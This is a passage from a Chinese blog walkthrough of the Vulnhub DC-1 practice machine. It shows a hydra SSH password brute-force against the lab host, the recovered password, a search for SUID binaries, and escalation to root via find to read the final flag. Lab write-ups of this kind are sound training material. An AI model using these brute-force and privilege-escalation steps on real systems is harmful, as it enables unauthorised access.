<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"># 但是发现一个 flag4 的用户, 使用 hydar 爆破这个用户的密码</span><br><span class="line">$ hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.22.23</span><br><span class="line"># -l 指定用户名</span><br><span class="line"># -p 指定密码字典</span><br><span class="line"># ssh://ip 指定使用协议和ip地址</span><br><span class="line"></span><br></pre></td></tr></tbody></table></figure>

<p><a target="_blank" rel="noopener" href="http://www.ha97.com/5186.html">暴力密码在线破解工具Hydra详解</a></p>
<p><img src="https://raw.githubusercontent.com/aisibuhuipao/img/main/202202272239231.png" alt="image-20220227223836106"></p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"># 登录目标机, 用户名: flag4密码: orange</span><br><span class="line"># 也可以使用 ssh 远程登录</span><br><span class="line"># 发现了第四个 flag</span><br><span class="line">$ cat flag4.txt</span><br><span class="line"></span><br><span class="line">Can you use this same method to find or access the flag in root?</span><br><span class="line"></span><br><span class="line">Probably. But perhaps it's not that easy.  Or maybe it is?</span><br><span class="line">翻译: 你能用这个同样的方法找到或访问根中的标志吗？也许可以。但也许并不那么容易。 也可能是这样？</span><br></pre></td></tr></tbody></table></figure>

<p><img src="https://raw.githubusercontent.com/aisibuhuipao/img/main/202202272243226.png" alt="image-20220227224315173"></p>
<p><img src="https://raw.githubusercontent.com/aisibuhuipao/img/main/202202272246801.png" alt="image-20220227224618301"></p>
<p><img src="https://raw.githubusercontent.com/aisibuhuipao/img/main/202202272246572.png" alt="image-20220227224645254"></p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"># flag4提示flag在root目录下</span><br><span class="line"># 在/root下发现thefinalflag.txt，但是没有读取的权限</span><br><span class="line">$ cd /root</span><br><span class="line"># 使用命令 find 试试</span><br><span class="line">$ find /root</span><br><span class="line"># 发现了最后一个 flag, 但是没有权限查看</span><br></pre></td></tr></tbody></table></figure>

<p><img src="https://raw.githubusercontent.com/aisibuhuipao/img/main/202202272250372.png" alt="image-20220227225006522"></p>
<p><img src="https://raw.githubusercontent.com/aisibuhuipao/img/main/202202272252803.png" alt="image-20220227225209803"></p>
<h3 id="四、提权"><a href="#四、提权" class="headerlink" title="四、提权"></a>四、提权</h3><p>根据flag3和flag4都提到了find,所以下面我们利用find文件提权</p>
<p>参考：<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_36119192/article/details/84872644">Linux下用SUID提权</a>、<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_40510246/article/details/95939784?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-1.nonecase&amp;depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-1.nonecase">linux提权-SUID提权</a>、<a target="_blank" rel="noopener" href="https://www.cnblogs.com/huchong/p/9961625.html">find命令之exec</a></p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"># SUID可以让调用者以文件拥有者的身份运行该文件，所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件，那么我们运行该文件的时候就得获得root用户的身份了。</span><br><span class="line"># 查找具有 root 权限的 SUID的文件</span><br><span class="line">$ find / -perm -u=s -type f 2&gt;/dev/null</span><br><span class="line"># 进入 root 目录查看 最后一个flag</span><br><span class="line">$ cd /root/</span><br><span class="line">$ ls</span><br><span class="line">$ cat thefinaflag.txt</span><br><span class="line">Well done!!!!</span><br><span class="line"></span><br><span class="line">Hopefully you've enjoyed this and learned some new skills.</span><br><span class="line"></span><br><span class="line">You can let me know what you thought of this little journey</span><br><span class="line">by contacting me via Twitter - @DCAU7</span><br><span class="line">翻译: 做得好！!!!!希望你喜欢这个，并学到一些新技能。你可以让我知道你对这个小旅程的看法。通过Twitter联系我 - @DCAU7</span><br></pre></td></tr></tbody></table></figure>

<p><img src="https://raw.githubusercontent.com/aisibuhuipao/img/main/202202272312999.png" alt="image-20220227231230776"></p>
<p><img src="https://raw.githubusercontent.com/aisibuhuipao/img/main/202202272314867.png" alt="image-20220227231414718"></p>
<p><img src="https://raw.githubusercontent.com/aisibuhuipao/img/main/202202272315776.png" alt="image-20220227231557703"></p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">柒妖</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://aisibuhuipao.github.io/2021/03/01/Vulnhub%E9%9D%B6%E6%9C%BA_DC-1/">http://aisibuhuipao.github.io/2021/03/01/Vulnhub%E9%9D%B6%E6%9C%BA_DC-1/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">柒妖</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/Vulnhub%E9%9D%B6%E6%9C%BA/">
                                    <span class="chip bg-color">Vulnhub靶机</span>
                                </a>
                            
                                <a href="/tags/%E6%B3%A8%E5%85%A5/">
                                    <span class="chip bg-color">注入</span>
                                </a>
                            
                                <a href="/tags/%E6%B8%97%E9%80%8F/">
                                    <span class="chip bg-color">渗透</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
        </div>
    </div>

    

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2021/12/20/%E6%9D%AD%E5%B7%9E/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/6.jpg" class="responsive-img" alt="来到杭州~">
                        
                        <span class="card-title">来到杭州~</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2021-12-20
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            柒妖
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/%E7%94%9F%E6%B4%BB/">
                        <span class="chip bg-color">生活</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2021/03/01/%E7%99%BD%E7%9B%92%E9%BB%91%E7%9B%92%E7%BB%95%E8%BF%87waf%E5%92%8C%E5%8A%A0%E5%9B%BA%E4%BB%A3%E7%A0%81/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/6.jpg" class="responsive-img" alt="代码审计过waf 黑盒测试过waf 加固代码，防注入">
                        
                        <span class="card-title">代码审计过waf 黑盒测试过waf 加固代码，防注入</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2021-03-01
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            柒妖
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/mysql/">
                        <span class="chip bg-color">mysql</span>
                    </a>
                    
                    <a href="/tags/%E7%BB%95WAF/">
                        <span class="chip bg-color">绕WAF</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


    

</main>




    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="503838841"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="/libs/aplayer/Meting.min.js"></script>

    

    <div class="container row center-align"
         style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2019-2022</span>
            
            <a href="/about" target="_blank">柒妖</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
                &nbsp;<i class="fas fa-chart-area"></i>&nbsp;站点总字数:&nbsp;<span
                        class="white-color">23.6k</span>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/aisibuhuipao" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:zn0548@live.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=254838212" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 254838212" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>







    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    

    
        
        <script type="text/javascript">
            // 只在桌面版网页启用特效
            var windowWidth = $(window).width();
            if (windowWidth > 768) {
                document.write('<script type="text/javascript" src="/libs/others/sakura.js"><\/script>');
            }
        </script>
    

    <!-- 雪花特效 -->
    

    <!-- 鼠标星星特效 -->
    

    

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
